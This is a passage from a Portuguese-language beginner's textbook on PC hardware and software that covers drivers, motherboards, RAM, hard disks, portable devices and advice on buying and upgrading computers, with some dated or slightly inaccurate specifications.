troladores de discos, controladores de memória, etc.

Como toda máquina, um computador, por mais avançado que seja, é


burro; pois não é capaz de raciocinar ou fazer nada sozinho. Ele pre-
cisa ser orientado a cada passo. É justamente aí que entram os pro-
gramas, ou softwares, que orientam o funcionamento dos compo-
nentes físicos do micro, fazendo com que eles executem as mais
variadas tarefas, de jogos à cálculos científicos.

46
Os programas instalados, determinam o que o micro “saberá” fazer.
Se você quer ser um engenheiro, primeiro precisará ir a faculdade e
aprender a profissão. Com um micro não é tão diferente assim, porém
o “aprendizado” não é feito através de uma faculdade, mas sim atra-
vés da instalação de um programa de engenharia, como o AutoCAD.
Se você quer que o seu micro seja capaz de desenhar, basta “ensiná-
lo” através da instalação de um programa de desenho, como o Corel
Draw! e assim por diante.

Toda a parte física do micro: processadores, memória, discos rígidos,


monitores, enfim, tudo que se pode tocar, é chamada de hardware,
enquanto os programas e arquivos armazenados são chamados de
software.

Existem dois tipos de programas, chamados de software de alto


nível, e software de baixo nível. Estas designações não indicam o
grau de sofisticação dos programas, mas sim com o seu envolvimen-
to com o Hardware.

O processador não é capaz de entender nada além de linguagem de


máquina, instruções relativamente simples, que ordenam a ele que
execute operações matemáticas como soma e multiplicação, além de
algumas outras tarefas, como leitura e escrita de dados, comparação,
etc.

Como é extremamente difícil e trabalhoso fazer com que o processa-


dor execute qualquer coisa escrevendo programas diretamente em
linguagem de máquina, usamos pequenos programas, como o BIOS
e os drivers de dispositivos do Windows para executar as tarefas
mais básicas, funcionando como intermediários, ou intérpretes, entre
os demais programas e o hardware. Estes programas são chamados
de software de baixo nível. Todos os demais aplicativos, como pro-
cessadores de texto, planilhas, jogos, etc. rodam sobre estes progra-
mas residentes, não precisando acessar diretamente ao hardware,
sendo por isso chamados de softwares de alto nível.

É justamente por causa desta divisão que muitas vezes um novo


dispositivo, uma placa de som que acabou se ser “espetada” na placa

47
mãe por exemplo, não funciona até que sejam instalados os drivers
que vem no CD que acompanha a placa.

O Windows é capaz de perceber a presença da nova placa, mas para


usa-la, ele precisa do driver correto. O driver funciona como uma
espécie de intérprete, que converte os comandos usados pelo Win-
dows nos comandos entendidos pela placa e vice-versa.

O próprio Windows possui uma grande biblioteca de drivers, que


permite instalar automaticamente muita coisa, sistema conhecido
como “Plug-and-Play”, mas muitos dispositivos, principalmente placas
mais recentes, lançadas depois da versão do Windows que estiver
usando, não funcionarão adequadamente até que sejam instalados
os drivers corretos. Sem os drivers, é impossível fazer qualquer placa
funcionar, é como perder a chave do carro. Felizmente, hoje em dia é
possível encontrar drivers para praticamente qualquer tipo de placa,
mesmo antiga, através dos sites dos fabricantes, ou através de pro-
gramas específicos para a busca de drivers.

Para instalar uma nova placa, o procedimento básico é sempre o


mesmo. Depois de instalar fisicamente a placa e ligar o PC, o Win-
dows exibirá uma aviso de “novo Hardware encontrado”, pedindo os
drivers em seguida. Escolha a opção de procurar um driver para o
dispositivo e mostre a localização dos arquivos, seja uma pasta no
CD-ROM, uma pasta do HD, pendriver, etc. Caso tenha apontado os
arquivos corretos, o Windows irá instala-los e o dispositivos passará a
funcionar.

Lembre-se que existem drivers específicos para cada sistema opera-


cional. Se tiver disponível apenas drivers para Windows por exemplo,
ele não funcionará no Linux, DOS ou outros sistemas, a menos que o
fabricante resolva disponibilizar novas versões do driver.

Continuando a explicação sobre software, não podemos nos esque-


cer do próprio sistema operacional, que funciona como uma ponte
entre o hardware e o usuário, automatizando o uso do computador, e
oferecendo uma base sólida a partir da qual os programas podem ser
executados.

48
Continuando com os exemplos anteriores, o sistema operacional po-
deria ser definido como a “personalidade” do micro. Um micro rodan-
do o Linux por exemplo, dificilmente seria tão amigável e fácil de ope-
rar quanto um outro micro rodando o Windows. Por outro lado, este
último jamais seria tão estável quanto um terceiro micro rodando o
Windows 7 ou 8. As diferenças não param por aí. Os programas de-
senvolvidos para rodar sobre um determinado sistema operacional
quase sempre são incompatíveis com outros. Uma versão do Corel
Draw! desenvolvida para rodar sobre o Windows, jamais rodaria so-
bre o Linux por exemplo, seria preciso reescrever todo o programa,
criando uma nova versão.

A interface dos vários sistemas operacionais também é diferente. No


MS-DOS, por exemplo, temos apenas um prompt de comando base-
ado em texto, enquanto no Windows temos uma interface gráfica
baseada em janelas, também chamada de interface amigável.

Esta divisão visa facilitar o trabalho dos programadores, que podem


se concentrar em desenvolver aplicativos cada vez mais complexos,
num espaço de tempo cada vez menor.
Fazer um programinha simples de controle de caixa em uma lingua-
gem de baixo nível, como o Assembler, por exemplo, tomaria pelo
menos um dia inteiro de trabalho de um programador. Um programa
com as mesmas funções, feito em uma linguagem visual (ou de alto
nível) como o Visual Basic ou Delphi, tomaria bem menos tempo, e
ainda por cima teria uma interface gráfica muito mais bonita e amigá-
vel, já que muitas das funções usadas no programa já estariam pron-
tas.

Arquiteturas

Nos primórdios da informática, nas décadas de 50, 60 e 70, vários


fabricantes diferentes disputavam o mercado. Cada um desenvolvia
seus próprios computadores, que eram incompatíveis entre si, tanto a
nível de hardware, quanto a nível de software.

Apesar de executarem as mesmas operações básicas, praticamente


tudo era diferente. Os componentes de um não serviam em outro, os

49
programas eram incompatíveis, e até mesmo as linguagens de pro-
gramação eram diferentes.

Porém, com a popularização dos microcomputadores era inevitável


uma padronização. No início da década de 80, tínhamos basicamente
apenas duas arquiteturas, ou “famílias” de computadores pessoais
diferentes: O PC, desenvolvido pela IBM, e o Macintosh, desenvolvi-
do pela Apple.

Como era mais barato, o PC tornou-se mais popular, ficando o uso


dos Macintosh restrito a nichos onde suas características peculiares o
tornam mais atraente, como a edição de imagens ou sons e editora-
ção eletrônica.

Durante muito tempo, a própria Apple pareceu se conformar com a


posição, lançando micros voltados principalmente para o seguimento
profissional. Atualmente, vemos uma aceitação maior dos Macs, prin-
cipalmente devido ao lançamento do iMac, mas os PCs ainda são a
grande maioria.

Como os micros PC possuem uma arquitetura aberta, ou seja, a pos-


sibilidade de vários fabricantes diferentes desenvolverem seus pró-
prios componentes, baseados em padrões já definidos, temos uma
lista enorme de componentes compatíveis entre si. Podemos escolher
entre várias marcas e modelos os componentes que melhor atendam
nossas necessidades e montar nossa própria configuração, assim
como podemos escolher os materiais que serão usados para constru-
ir uma casa. Também é possível melhorar posteriormente o micro
montado através de upgrades, trocando alguns componentes para
melhorar seu desempenho.

Mesmo micros de grife, como os IBM, HP, Compaq, Itautec, Dell, etc.
também são micros montados, já que quase todos os seus compo-
nentes são comprados de outros fabricantes. Temos, por exemplo,
um processador da Intel, um disco rígido da Quantum, uma placa
mãe da Asus, memórias da Kingstone, CD-ROM da Mitsumi, um mo-
nitor da LG, e por aí vai.

50
A diferença principal entre os micros montados e os micros de grife é
que os últimos são montados por grandes empresas e temos todo o
suporte e garantia. Porém, adquirindo um micro de grife, quase sem-
pre pagamos mais caro e ao mesmo tempo não temos tanta liberdade
para configurar o micro a gosto.

Entretanto, o simples fato de comprar um micro de grife não é garan-


tia de qualidade. Em geral eles possuem uma qualidade bem superior
à dos micros montados por lojas de informática por exemplo. Porém,
a necessidade de lançar micros de baixo custo, muitas vezes leva os
grandes fabricantes a lançarem verdadeiras bombas no mercado,
usando componentes de baixíssima qualidade.

A lista é enorme, já tivemos casos de micros de grife que não traziam


sequer memória cache L2 (na época em que este ainda fazia parte da
placa mãe). Pesquisando por aí, você irá encontrar vários PCs de
marcas conceituadas, usando placas PC-Chips, pouca memória
RAM, etc. “economias” que aumentam o lucro do integrador, deixan-
do a bomba na mão do infeliz que compra-los.

Os Componentes

Agora que você já entendeu o que se passa dentro do gabinete de


um PC, vamos estudar a função dos seus principais componentes?

Você já deve estar familiarizado com a função do processador. Atu-


almente encontramos no mercado vários processadores diferentes.
Em ordem de evolução, podemos citar o XT, 286, 386, 486, o Pen-
tium I, II e III, o K6, o K6-2, o Celeron, Duron e o Athlon.

As séries i3, i5, i7 e i9 da Intel, estão classificadas na categoria Core


de 2ª a 7ª geração.

Definimos o processador como o cérebro do micro. Pois bem, todo o


cérebro precisa de um corpo, que é justamente a placa mãe. Ela traz
todos os componentes que permitem ao processador comunicar-se
com os demais periféricos, como discos rígidos, placas de vídeo, etc.

51
Outra função da placa mãe é acomodar e alimentar eletricamente o
processador.

Cada processador precisa de uma placa mãe desenvolvida especial-


mente para ele pois, devido à diferenças de arquitetura, os processa-
dores possuem “necessidades” diferentes. Cada processador possui
um número diferente de contatos, ou terminais, opera usando uma
voltagem diferente e precisa de um conjunto de circuitos de apoio
desenvolvidos especialmente para ele. O próprio encaixe do proces-
sador muda de família para família. Você jamais poderá instalar um
AMD numa placa mãe para INTEL por exemplo.

Apesar das diferenças, normalmente as placas mãe são desenvolvi-


das para não serem compatíveis com mais de um processador. Uma
placa mãe soquete 775 por exemplo, suportará apenas processado-
res para este tipo de soquete.

Uma placa soquete 1651 por sua vez, suporta processadores da série
Core. Placas soquete A são compatíveis com os processadores
Athlon e Duron da AMD.

A importância da placa mãe não para por aí. Ela determina quais
componentes poderão ser usados no micro (e consequentemente as
possibilidades de upgrade) e influencia diretamente na performance
geral do equipamento.

Com certeza, você não gostaria de gastar 200 ou 300 dólares numa
placa de vídeo de última geração, só para descobrir logo depois que
não poderá instalá-la, pois a placa mãe do seu micro não possui um
slot AGP ou Pci Express.

Placa Mãe

52
Para poder trabalhar, o processador precisa também de memória
RAM, que é vendida na forma de pequenas placas, chamadas de
módulos de memória, que são encaixadas na placa mãe. Você tam-
bém ouvirá muito o termo “pente de memória” uma espécie de apeli-
do, que surgiu por que os contatos metálicos dos módulos lembram
um pouco os dentes de um pente.

Todos os programas e arquivos são armazenados no disco rígido,


também chamado de HD (Hard Disk) ou Winchester.

A capacidade do disco rígido, medida em Gigabytes ou Terabytes,


determina a quantidade de arquivos e programas que será possível
armazenar.

O disco rígido também exerce uma grande influência sobre a perfor-


mance global do equipamento. O disco rígido é acomodado no gabi-
nete e ligado à placa mãe através de um cabo “FlatCable” ou “SATA”
(Serial ATA).

Módulo de memória

Disco Rígido

53
Disco hibrido (SSD)

Outro componente essencial é o gabinete, a caixa de metal que aco-


moda e protege os frágeis componentes internos do micro. O gabine-
te traz também a fonte de alimentação, responsável por converter a
corrente alternada da tomada (AC) em corrente contínua (DC) usada
pelos componentes eletrônicos. A fonte também serve para atenuar
pequenas variações de tensão, protegendo o equipamento.

A placa mãe, o processador, os módulos de memória e o disco rígido,


são os quatro componentes básicos do micro. Porém, por enquanto
temos um equipamento “autista”, incapaz de receber ou transmitir
informações. Precisamos agora adicionar “sentidos” na forma de mais
componentes. Os essenciais são a placa de vídeo (caso ela não seja
on-board), que permite que o micro possa gerar imagens a serem
mostradas no monitor, teclado e mouse, que permitem ao usuário
operar o micro.

Outros componentes permitem ampliar os recursos do micro, mas


podem ser definidos como opcionais, já que o computador pode fun-
cionar sem eles:

O CD/DVD-ROM permite que o micro leia CDs e DVDs com jogos ou


programas ou filmes. Caso o micro possua também uma placa de
som, você poderá ouvir também CDs de música.

A placa de som permite que o micro gere sons, tocados por um par
de caixas acústicas. A placa de som também traz entrada para um
fone de ouvido. Junto com um drive de CD-ROM e a placa de som
formam o chamado Kit multimídia.

54
O Fax-Modem permite a comunicação entre dois computadores
usando um linha telefônica. Ele permite a recepção e transmissão de
faxes e o acesso à Internet. Hoje em dia, o Fax-Modem interno é um
componente praticamente inexistente, afinal, um micro pode ser co-
nectado à Internet através de um modem externo via placa de rede.

Temos também o drive de disquetes, que apesar de ser um compo-


nente de baixa tecnologia, raramente é usado, pois os disquetes não
são mais usados para transportar dados, esse tarefa passou a ser
feita por pendrivers, HD externos, DCDs ou DVDs.

Além destes, temos uma gama enorme de acessórios: Impressoras,


Scanners (que permitem digitalizar imagens), câmeras fotográficas
digitais (que ao invés de usarem negativos geram imagens digitais),
câmeras de vídeo conferência, placas de captura de vídeo e muitos
outros.

Desktops, Notebooks, Handhelds e Palmtops

Durante a década de 70, os computadores eram classificados como


computadores, minicomputadores ou micro computadores, de acordo
com seu tamanho. Naquela época, “minicomputador” era qualquer
coisa do tamanho de um armário e os grandes computadores ocupa-
vam facilmente uma sala inteira.

Atualmente, os termos da moda são outros. Os computadores de


mesa são chamados de desktops. Os notebooks possuem os mes-
mos recursos dos micros de mesa, porém são mais leves e conso-
mem menos energia, visando aumentar a autonomia das baterias.
Comparados com os desktops, a vantagem dos notebooks é sua
portabilidade e as desvantagens são os fatos de serem mais caros,
mais frágeis e menos confortáveis de usar.

Os primeiros computadores portáteis, lançados no início da década


de 80 pesavam em média 12 quilos, enquanto os atuais não costu-
mam pesar mais do que 3 Kg. Para quem precisa de portabilidade,
mas ao mesmo tempo não abre mão de um micro com todos os re-
cursos de um micro de mesa, os notebooks são a solução mais acer-
tada.

55
Para quem precisa apenas de recursos mais básicos, como proces-
samento de textos, planilhas, agenda eletrônica ou apenas armaze-
nar informações, os notebooks acabam sendo uma solução cara e
antiquada. Além do peso, temos uma autonomia relativamente baixa
das baterias, em geral 3 ou 4 horas.

A partir dos anos 90, tivemos a popularização de mais duas classes


de computadores portáteis, os handhelds e os palmtops. A ideia
principal é criar aparelhos pequenos o suficiente para levar no bolso,
que sejam leves e consumam pouca energia, mas, ao mesmo tempo,
capazes de executar todas as funções básicas, como processamento
de textos, planilhas, coleta de dados, acesso à Internet, jogos, etc.

Os dois tipos de aparelho possuem conceitos bem diferentes. Os


handhelds são uma espécie de notebook em miniatura, com o mesmo
desenho básico, com o teclado de um lado e a tela do outro. Exem-
plos de handhelds são o Cassiopéia, HP 620, Psion Series 5 e Sharp
HC-4600. Com exceção do Psion, estes aparelhos utilizam o Win-
dows CE, que é uma versão simplificada do Windows 98, que apesar
de não rodar os mesmos programas que temos nos micros de mesa,
possui versões compactas do Word, Excel e Power Point, além de
permitir a instalação de programas ou jogos desenvolvidos para ele.

56
Handheld Psion Revo

Os palmtops por sua vez, são ainda mais compactos e não possuem
teclado. O texto é ou digitado sobre um teclado gráfico formado em
parte da tela, ou então escrito à mão em um espaço reservado. O
exemplo mais famoso e bem sucedido de palmtop é o Palm Pilot da
3com, que utiliza o PalmOS, um sistema operacional proprietário. O
sucesso do Palm Pilot estimulou os desenvolvedores a criar milhares
de programas para ele, englobando praticamente todo o tipo de apli-
cações, de cálculos científicos a jogos. Estima-se que em Dezembro
de 2001 já existissem mais de 75.000 programas, uma boa parte
aplicativos freeware.

A Microsoft concorre com os Palms através do Pocket PC, uma ver-


são reduzida do Windows que roda em PCs de mesa. Em versões
anteriores, este sistema era chamado de Windows CE. O nome mu-
dou apenas por questões de marketing.

Os Palmtops com o Pocket PC quase sempre trazem telas coloridas,


processadores Arm de até 220 MHz, de 16 a 64 MB de memória,
suporte a MP3, etc. configurações bem superiores às dos Palms que
trazem 2 ou 8 MB de memória, processadores Dragon Ball de 32
MHz e telas monocromáticas na maioria dos modelos. Por outro lado,
o Pocket PC também é um sistema muito mais pesado, o que nivela o
desempenho das duas classes.

Em todos os casos, é possível fazer a conexão com um micro de


mesa para fazer backup das informações gravadas, trocar arquivos e
instalar novos programas.

57
Palm III3 Compaq Ipaq, com o
MS Pocket PC

Conforme os processadores e outros componentes evoluem, não é


apenas a velocidade que aumenta. Os componentes são cada vez
mais miniaturizados, o que traz como consequência um ganho es-
sencial no ramo dos portáteis: um consumo elétrico cada vez mais
baixo.

Um 486 de 100 MHz processa 100 milhões de instruções por segun-


do e consome aproximadamente 5 Watts de eletricidade. Um Mobile
Pentium III de 500 MHz (a versão especial, com um consumo elétrico
ultra baixo) processa 1.5 bilhão de instruções, com apenas 3 watts. A
mesma proporção se mantém nos chips destinados a aparelhos por-
táteis.

Isto significa que os aparelhos portáteis são capazes de executar


cada vez mais funções e rodar aplicativos cada vez mais complexos.
E esta é uma tendência que veio pra ficar.

Recentemente a Microsoft lançou uma versão do Windows destinada


especialmente a micros de mão e outros tipos de sistemas integra-
dos, o Windows XP Embedded. O Linux pode ser facilmente portado
para várias arquiteturas e é o concorrente natural para o Windows
também neste campo.

A diferença de recursos entre os PCs de mesa e um handheld está


diminuindo rápido, embora a diferença de preço também. Das agen-
das eletrônicas de 50 reais, saltamos para os iPaqs de 1500 reais.

58
Atualmente o mercado se estabilizou na utilização dos iPOD, iPED e
o ainda útil NetBook.

Ipod

Iped

NetBook

59
Escolhendo a melhor configuração

Todos os componentes de um PC, influenciam diretamente no de-


sempenho global da máquina. Como num carro, onde um único com-
ponente de baixo desempenho afeta negativamente todo o conjunto.

Apesar do desejo de todos ser um micro equipado com um processa-


dor top de linha, muita memória RAM, vários Gigabytes de espaço no
disco rígido, placa de vídeo 3D, DVD, etc. Nem todos estamos dis-
postos a gastar 2.000 ou 3.000 dólares numa configuração assim.

Entra em cena então o fator custo benefício, determinar qual configu-


ração seria melhor dentro do que se pode gastar. O objetivo deste
trecho é justamente este, ajudá-lo a escolher a melhor configuração
em termos de custo benefício em cada caso. Para isto, estudaremos
no que cada componente afeta o desempenho e em quais aplicações
cada um é mais importante.

A primeira coisa que deve ser levada em conta é a aplicação a que o


micro será destinado, ou seja, quais programas serão utilizados nele.
Um PC usado em um escritório, onde são usados o Word, Excel e
Internet por exemplo, não precisa de um processador muito podero-
so, mas é indispensável uma quantidade pelo menos razoável de
memória RAM, e um disco rígido razoavelmente rápido. Enquanto
que, num micro destinado a jogos, o principal seria um processador
rápido, combinado com uma boa placa de vídeo 3D.

Escolhendo a placa mãe

A placa mãe é o componente que deve ser escolhido com mais cui-
dado. Uma placa mãe de baixa qualidade colocará em risco tanto o
desempenho quanto a confiabilidade do equipamento.

Ao comprar uma placa mãe, verifique quais processadores ela supor-


ta, se possui um slot AGP ou Pci Express e se a quantidade de slots
ISA, SATA e PCI é suficiente para a quantidade de periféricos que
você pretende instalar.

60
A questão mais importante é a qualidade da placa. Além dos recur-
sos, este é o principal diferencial entre as várias que você encontrará
no mercado.

Placas de baixa qualidade além de prejudicarem o desempenho, po-


dem tornar o micro instável, causando travamentos constantes no
Windows. Travamentos que frequentemente são causados por falhas
de hardware, e não por bugs do programa.

Procure comprar placas de boas marcas, como Asus, Gigabyte e


MKV. As placas da Intel também são excelentes, mas preste atenção
se a placa realmente foi fabricada pela Intel: muitos vendedores ven-
dem placas com chipsets Intel como “placas da Intel”. Muitos fabri-
cantes usam chipsets Intel em suas placas, mas isto não é garantia
de qualidade. Não adianta uma placa de segunda linha possuir um
bom chipset.

Evite ao máximo comprar placas TX-Pro, VX-Pro, BX-Pro, SX-Pro,


PC-100, Viagra, PC-Chips e placas que não trazem especificado o
nome do fabricante. Apesar de serem muito mais baratas, e quase
sempre trazerem placas de som, vídeo, modems e até placas de rede
on-board, estas placas invariavelmente são de baixa qualidade, fabri-
cadas geralmente pela PC-Chips, especializada em fabricar placas de
baixíssimo custo mas de qualidade duvidosa.

Você pode perguntar por que estas placas são inferiores, já que mui-
tas vezes usam o mesmo chipset de placas de boas marcas. O dife-
rencial é a qualidade da placa de circuito. Uma placa mãe é confecci-
onada usando-se uma técnica chamada MPCB (multiple layer contact
board) que consiste em várias placas empilhadas como se fossem
uma só.

Acontece que uma placa de circuitos deste tipo tem que ser projetada
e fabricada minuciosamente, pois qualquer erro mínimo na posição
das trilhas, fará com que surjam interferências, que tornarão a placa
instável. Isto também prejudica o desempenho, impedindo que a co-
municação entre os componentes seja feita na velocidade normal.

61
A diferença de desempenho de um micro montado com uma boa
placa mãe, para outro de configuração parecida, mas usando uma
placa mãe de baixa qualidade pode chegar a 20%. Equivaleria a tro-
car um Pentium II 800 por outro de 600 MHz! A fim de cortar custos,
diminui-se o tempo de desenvolvimento e se apela para técnicas mais
baratas e menos precisas de produção, criando os problemas descri-
tos.

Certamente é tentador ver o anúncio de uma placa mãe que já vem


com placa de som, placa de vídeo e modem por 100 ou 120 dólares,
enquanto uma placa de uma boa marca custa 150, 180 ou mesmo
200 dólares e muitas vezes não traz nenhum destes acessórios. Mas,
lembre-se que esta economia pode lhe trazer muita dor de cabeça, na
forma de instabilidade, travamentos e incompatibilidades. Estas pla-
cas podem até ser usadas em micros mais baratos, destinados a
aplicações leves, onde a economia é mais importante, mas não pen-
se em usar uma em um micro mais parrudo, pois não valerá à pena.
Se o problema é dinheiro, prefira comprar um processador mais sim-
ples e barato, mas colocá-lo em uma boa placa mãe.

Escolhendo os outros periféricos

Existem basicamente 4 determinantes de desempenho num micro: o


processador, a quantidade de memória RAM, a velocidade do disco
rígido e a placa de vídeo. A importância de cada um varia de acordo
com a aplicação do micro.

Memória RAM

Se o micro possui pouca memória RAM, o processador terá que usar


o disco rígido para guardar os dados que deveriam ser armazenados
na memória, tornando o sistema extremamente lento. Por outro lado,
instalar mais memória do que o necessário será apenas um desper-
dício, pois não tornará o sistema mais rápido.

Você notará que é preciso instalar mais memória quando o micro


começar a ficar lento e a acessar intermitentemente o disco rígido em
momentos de atividade mais intensa.

62
Se o usuário trabalha apenas com aplicativos mais leves, como Word,
Excel, Internet e não costuma abrir mais de um aplicativo ao mesmo
tempo, 1 GB pode ser suficiente, apesar de 2 Gb ser o ideal.

Se, por outro lado, são usados programas mais pesados ou se são
abertos vários programas ao mesmo tempo, então o mínimo seria 2
GB e o ideal 4 GB. 4 GB também são suficientes se o micro se desti-
na principalmente a jogos.

Caso o micro se destine ao processamento de imagens, vídeo ou


editoração, então devem ser usados pelo menos 8 GB.

Dependendo do tamanho dos arquivos a serem processados, o ideal


pode subir para 16 ou mesmo 32 GB. Mas antes verifique se a placa
mãe tem suporte para essa quantidade de memória RAM.

Hoje em dia os módulos de memória SDRAM (os usados na maioria


dos PCs atuais) estão muito baratos, por isso não vale mais à pena
economizar em memória RAM. Mesmo que o PC se destine a aplica-
tivos leves, instale logo 2 ou mesmo 4 GB. É melhor pecar pelo ex-
cesso do que pela falta.

Com mais memória o PC se manterá rápido por mais tempo. Não se


esqueça que os programas ficarão cada vez mais pesados com o
passar do tempo. O que hoje pode até ser um desperdício, amanhã
será requisito mínimo para muitos sistemas.

A instalação de mais memória pode dar um novo ânimo a um micro


mais antigo, principalmente se o micro possui apenas 1 GB. Mas não
exagere, pois mesmo com muita memória será difícil rodar aplicativos
mais pesados devido à fragilidade do conjunto. O ideal seriam 4 GB
em micros mais novos.

Processador

Nem sempre a instalação de um processador mais moderno torna o


micro mais rápido. Muitas vezes, aumentar a quantidade de memória
ou trocar o disco rígido faz mais efeito. Como sempre, depende da
aplicação.

63
Caso o micro se destine principalmente a jogos, então vale à pena
investir em um processador top de linha, como um Athlon ou um i7.
Caso o micro de destine ao processamento de imagens ou editora-
ção, um processador top de linha irá ajudar, mas apenas se o micro
possuir bastante memória RAM. Se o dinheiro estiver curto, é preferí-
vel comprar um processador médio, como um i3 e investir em mais
memória.

Finalmente, caso o micro se destine a aplicações leves, então o ideal


será adquirir um processador mais simples e investir a economia em
um pouco mais de memória, um disco rígido melhor, ou numa placa
mãe de melhor qualidade.

Disco Rígido

O desempenho do disco rígido determina a velocidade em que serão


abertos programas e arquivos. Um disco rígido rápido, também ajuda
caso o micro tenha pouca memória. Mesmo com um processador
parrudo e muita memória, tudo ficará lento caso o disco rígido não
acompanhe.

Quase sempre, os discos rígidos de maior capacidade são mais rápi-


dos, mas como sempre existem exceções. Procure saber o tempo de
acesso, a velocidade de rotação e a densidade do disco.

O tempo de acesso do disco varia geralmente entre 8 e 12 milesse-


gundos, dependendo do HD. O tempo de acesso determina quanto
tempo a cabeça de leitura demorará para achar o dado a ser lido. Um
valor mais baixo corresponde a um melhor desempenho.

A velocidade de rotação é medida em RPMs, ou rotações por minuto.


Quanto mais rápido o disco girar, mais rápido um dado será encon-
trado. A densidade, ou quantos dados caberão em cada disco tam-
bém determina o desempenho, pois como os dados estarão mais
próximos, serão localizados mais rapidamente. A velocidade adequa-
da para uso normal é de +/- 7.500 RPM.

64
Placa de Vídeo

Como vimos, existem tanto placas de vídeo 2D, quanto placas de


vídeo 3D. Caso o micro se destine a jogos, ou processamento de
imagens 3D (usando o 3D Studio por exemplo), é indispensável o uso
de uma placa de vídeo 3D, caso contrário o micro simplesmente não
será capaz de rodar o aplicativo ou ficará extremamente lento. No
caso de jogos, uma placa 2D irá atrasar os “frames” causando perda
na versatilidade.

Se forem usados apenas aplicativos de escritório ou forem processa-


das imagens em 2D, então uma placa de vídeo 3D não será necessá-
ria.

Existem tanto aceleradoras 3D, que devem ser usadas em conjunto


com uma placa 2D comum (Monster 1 e Monster 2 por exemplo),
quanto placas Combo (as mais comuns), que desempenham tanto as
funções 3D quanto 2D (todas as placas atuais). Atualmente até mes-
mo as placas de vídeo on-board estão vindo com recursos 3D, apesar
do desempenho não se comparar com uma placa mais parruda.

Modem

Atualmente, as placas mãe raramente trazem slot de conexão para


uso de modem interno, os usados em conexão de linha discada. Ape-
sar do custo de um modem (MODulador/dEModulador) externo ser
um pouco caro, tem a vantagem de ser compatível com qualquer
placa mãe com saída para conexão de rede via cabo.

Placa de Som

A placa de som não influencia em nada o desempenho do micro,


apenas determina a qualidade do áudio. Para uso normal, uma placa
de som simples como uma Sound Blaster 32, ou mesmo uma daque-
las placas “genéricas”, geralmente equipadas com chipsets Yamaha,
dão conta do recado.

65
Placas mais caras farão diferença caso você pretenda trabalhar com
edição musical, ou faça questão de ouvir músicas em MIDI com o
máximo de qualidade.

Existem também placas de som 3D, como a Turtle Beath Montego e a


Sound Blaster Live, que geram sons que parecem vir de todas as
direções, mesmo usando caixas acústicas comuns. Este efeito é mui-
to interessante em jogos, pois oferece uma sensação de realidade
muito maior.

Upgrades e atualizações

Fazer um upgrade, significa trocar alguns componentes de um micro


já ultrapassado a fim de melhorar seu desempenho. Porém, muitas
vezes, o micro está tão desatualizado que seria preciso trocar quase
todos os componentes para conseguir atingir um desempenho aceitá-
vel. Neste caso, compensaria mais vender o micro antigo e comprar
um novo.

O segredo para realizar um bom upgrade, é detectar os “pontos fra-


cos” da configuração, componentes que possuem um desempenho
muito inferior ao restante do conjunto. Para exemplificar, analisemos
agora algumas configurações:

Configuração 1:
Processador Pentium de 100 MHz
8 MB de memória RAM HD de 1.2 GB
Placa de Vídeo de 1 MB
Monitor SVGA de 14 polegadas

Temos aqui um micro bem antigo, de configuração extremamente


modesta, mas que tem um grave ponto fraco: a pouca quantidade de
memória RAM. O ideal aqui seria adicionar mais 32 MB de memória,
totalizando 40 MB, o que multiplicaria a velocidade do equipamento.

Também valeria à pena trocar o processador por um K6 ou Pentium


de 200 MHz, já que neste caso não precisaríamos trocar também a
placa mãe.

66
Dois pentes de memória de 72 vias de 16 MB cada, e um processa-
dor de 200 MHz custam cerca de 150 reais, que resultariam em um
ganho de performance de pelo menos 300%. Note que neste caso
precisaríamos usar componentes usados.

O disco rígido só deveria ser trocado caso o usuário estivesse com


problemas de espaço.

Configuração 2:
Pentium 233 MMX
32 MB de memória RAM
HD de 40 GB
Placa de vídeo de 2 MB
Monitor SVGA de 14 polegadas

Apesar de ultrapassada, agora temos uma configuração equilibrada.


As únicas mudanças viáveis seriam o aumento da Quantidade de
memória para 64 MB ou a troca do disco rígido (caso o usuário esteja
com problemas de espaço).

Não seria uma boa ideia pensar em trocar o processador, pois para
instalar um Pentium II, Celeron, ou mesmo um K6-2 neste micro, terí-
amos que trocar também a placa mãe. Caso os módulos de memória
atuais sejam de 72 vias, o gasto seria ainda maior, já que as placas
mãe mais modernas possuem encaixes apenas para módulos de 168
vias o que nos obrigaria a trocar também as memórias.

Caso o usuário do micro goste de jogos, ou pretenda trabalhar com


imagens tridimensionais, então uma placa de vídeo 3D, de um mode-
lo mais simples, seria uma boa ideia.

Configuração 3:
Pentium II de 266 MHz
64 MB de memória RAM
HD de 40 GB
Placa de vídeo de 2 MB
Monitor SVGA de 15 polegadas

67
A primeira coisa a considerar neste exemplo seria a troca do proces-
sador por um Celeron de 500 ou 533 MHz, já que poderíamos trocar
apenas o processador. Teríamos então um excelente configuração,
com exceção do disco rígido, muito pequeno e lento para um micro
deste porte.

Seria uma boa ideia trocá-lo por um de 80 GB ou mais. Se fosse adi-


cionada também uma placa de vídeo 3D passaríamos então a ter
praticamente um computador razoável para uso doméstico.

O aumento da quantidade de memória para 128 MB deveria ser con-


siderado caso o usuário tenha o hábito de trabalhar com vários pro-
gramas abertos ao mesmo tempo, ou tenha o hábito de abrir arquivos
muito grandes.

As peças antigas, no caso o processador o disco rígido e a placa de


vídeo poderiam ser vendidas depois para cobrir parte do gasto do
upgrade. Ainda existe um mercado grande para discos rígidos usa-
dos, ou outras como: MB. RAM, processador, etc.

Configuração 4:
Pentium i7 de 3,6 MHz
32 GB de memória RAM
HD de 2.2 TB
Placa de vídeo de 2 GB
Monitor SVGA de 22 polegadas

Este seria um top de linha, com uma configuração excelente para


jogos, com gráficos tridimensionais e de certo modo, um desperdício
para uso em processadores de texto ou planilhas, dado ao seu custo.

O melhor custo beneficio

Simplesmente comprar o melhor micro que o dinheiro pode pagar,


não é uma tarefa muito difícil, basta comprar os melhores e em geral
mais caros componentes, encher de memória RAM e voilà. Porém, a
não ser você seja algum milionário excêntrico, esta provavelmente
não será uma boa ideia. Você já deve ter percebido que no mundo da
informática as coisas evoluem muito rápido. A cada semana, novos

68
componentes são lançados. Mas, prestando um pouco de atenção na
ciranda dos preços, você vai perceber duas coisas:

1- Em geral os fabricantes lançam novos componentes com


pequenos avanços sobre os anteriores, porém com um grande au-
mento de preço. No ramo dos processadores por exemplo, os novos
modelos são sempre apenas 33 ou 50 MHz mais rápidos que os ante-
riores. Na família Pentium III, por exemplo, tivemos em menos de um
ano, lançadas versões de 450, 500, 533, 550, 600, 650, 667, 700,
733, 750, 800 e 1000 MHz.

2- Sempre que uma nova versão é lançada, as anteriores caem


de preço, e as muito antigas são retiradas do mercado. A diferença
de preço entre a versão top de linha e a anterior, que é em geral ape-
nas 5 ou 6% mais lenta, pode chegar a quase 50%, e a diferença
